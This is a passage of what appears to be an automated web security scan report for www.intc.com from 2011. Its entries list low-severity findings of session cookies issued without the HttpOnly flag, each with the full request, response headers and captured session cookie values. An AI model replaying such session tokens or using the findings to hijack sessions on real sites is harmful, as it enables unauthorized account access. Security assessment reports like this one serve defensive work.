The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /analystCenter.cfm HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:14:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:50 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:50 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:14:50 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...

12.57. http://www.intc.com/annuals.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intc.com
Path:   /annuals.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /annuals.cfm HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:16:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A16%3A36%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:16:36 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:16:36 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:16:36 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...

12.58. http://www.intc.com/briefcase.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intc.com
Path:   /briefcase.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /briefcase.cfm HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:15:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A15%3A09%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:10 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40579%2E7605208;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:10 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:15:10 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...

12.59. http://www.intc.com/common/download/download.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intc.com
Path:   /common/download/download.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /common/download/download.cfm?CompanyID=INTC&FileID=361738&FileKey=f79153d7-eceb-4b38-8a7e-e2917f999659&FileName=_0008_virtual_1.jpg HTTP/1.1
Host: www.intc.com
Proxy-Connection: keep-alive
Referer: http://www.intc.com/index.cfm?iid=ftr+invrel
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NOMOBILE=0; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C1D065BF6CBF3E92923967C8F41218506; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Sat, 05 Feb 2011 23:14:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A15%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:15 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:15 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:14:15 GMT;path=/
location: http://files.shareholder.com/downloads/INTC/1158415371x0x361738/f79153d7-eceb-4b38-8a7e-e2917f999659/_0008_virtual_1.jpg
Content-Type: text/html; charset=UTF-8


<script type="text/javascript">
<!--//

document.write(" <img src=\"http://apps.shareholder.com/track/trackpage.aspx?c=INTC&p=common%2Fdownload%2Fdow
...[SNIP]...

12.60. http://www.intc.com/common/download/download.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intc.com
Path:   /common/download/download.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /common/download/download.cfm HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Sat, 05 Feb 2011 23:15:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: X_SESSION=1158416520%7C%20%7Bts%20%272011%2D02%2D05%2018%3A15%3A59%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A15%3A59%27%7D%7C5E03233E5E00EFF0D4D7E6B4BD7D2167;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:59 GMT;path=/
Set-Cookie: X_BRIEFCASE=UPDATED%7C40489%2E7610995;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:59 GMT;path=/
Set-Cookie: X_PREVIEW=;expires=Fri, 05-Feb-2010 23:15:59 GMT;path=/
location: http://files.shareholder.com/downloads/x/1158416520x0x//
Content-Type: text/html; charset=UTF-8


<script type="text/javascript">
<!--//

document.write(" <img src=\"http://apps.shareholder.com/track/trackpage.aspx?c=X&p=common%2Fdownload%2Fdownlo
...[SNIP]...

12.61. http://www.intc.com/common/mobile/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intc.com
Path:   /common/mobile/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /common/mobile/?CompanyID=INTC HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:16:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A16%3A02%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:16:02 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:16:02 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:16:02 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8
...[SNIP]...

12.62. http://www.intc.com/contactUs.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intc.com
Path:   /contactUs.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /contactUs.cfm HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:14:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A52%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:52 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:52 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:14:52 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...

12.63. http://www.intc.com/corpInfo.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intc.com
Path:   /corpInfo.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corpInfo.cfm HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%